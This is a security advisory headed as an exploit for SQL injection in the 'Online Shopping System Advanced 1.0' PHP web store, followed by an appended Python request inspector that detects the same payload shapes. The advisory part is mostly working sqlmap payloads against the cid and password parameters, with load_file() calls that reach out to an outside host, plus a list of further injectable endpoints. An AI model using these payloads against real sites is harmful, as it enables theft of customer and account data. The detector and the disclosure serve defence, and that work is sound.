Online Shopping System Advanced 1.0 SQL Injection

2022.10.12
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

The online-shopping-system-advanced-1.0 suffers from multiple SQLi. The attacker can steal all information from the database of this system.

Status: CRITICAL

[+] Exploit:

```MYSQL
Parameter: cid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' OR NOT 4084=4084 AND 'icSi'='icSi

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT (ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#
```

--------------------------------------------------------------------------------------------

```MYSQL
Parameter: password (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT 7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on
```

--------------------------------------------------------------------------------------------

## And more:

```txt
[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]]
[1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]]
[1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php [password parameter]]
[1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]]
[1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]]
[1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php [email parameter]]
[1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [name parameter]]
```

PoC: https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
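As an added defender-side example (not part of the advisory or the project's own code), the following Python request-body inspector flags the parameters this advisory lists (cid, password, p, email, name on the named scripts) whenever they carry the boolean, error-based, time-based, UNION or load_file() shapes shown in the payloads above. The script-to-parameter map and the sample request bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Scripts and parameters the advisory names as injectable (constructed map).
WATCHED_PARAMS = {
    "action.php": {"cid"},
    "login.php": {"password", "email"},
    "product.php": {"p"},
    "review.php": {"email", "name"},
}

# Indicators drawn from the payload shapes in the advisory: sqlmap-style
# boolean, time-based, UNION and FLOOR(RAND()) error-based techniques,
# load_file() reads, and a quote that breaks out of the string literal.
INDICATORS = [
    ("boolean", re.compile(r"\b(?:OR|AND)\s+(?:NOT\s+)?\d+\s*=\s*\d+", re.I)),
    ("time", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("union", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("error", re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(", re.I)),
    ("file", re.compile(r"\bload_file\s*\(", re.I)),
    ("quote", re.compile(r"'\s*(?:AND|OR)\b", re.I)),
]


def inspect_post(script: str, body: str) -> dict:
    """Return {param: [technique, ...]} for watched params carrying indicators."""
    hits = {}
    # parse_qsl URL-decodes values, so encoded quotes and '+' spaces are seen.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name not in WATCHED_PARAMS.get(script, set()):
            continue
        found = [label for label, rx in INDICATORS if rx.search(value)]
        if found:
            hits[name] = found
    return hits


# Constructed sample POST bodies modelled on the advisory's parameter names.
SAMPLES = [
    ("action.php", "getProduct=1&setPage=1&pageNumber=1&cid=2"),
    ("action.php", "getProduct=1&setPage=1&pageNumber=1&cid=2%27+AND+"
                   "%28SELECT+1+FROM+%28SELECT%28SLEEP%2817%29%29%29x%29+AND+%27a%27%3D%27a"),
    ("login.php", "email=user%40example.test&password=p%40ss&remember-me=on"),
    ("login.php", "email=user%40example.test&password=x%27+OR+NOT+1%3D1%23&remember-me=on"),
]


def scan(samples=SAMPLES) -> list:
    """Inspect every sample and return (script, hits) pairs in order."""
    return [(script, inspect_post(script, body)) for script, body in samples]


if __name__ == "__main__":
    for script, hits in scan():
        print(script, hits or "clean")
```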

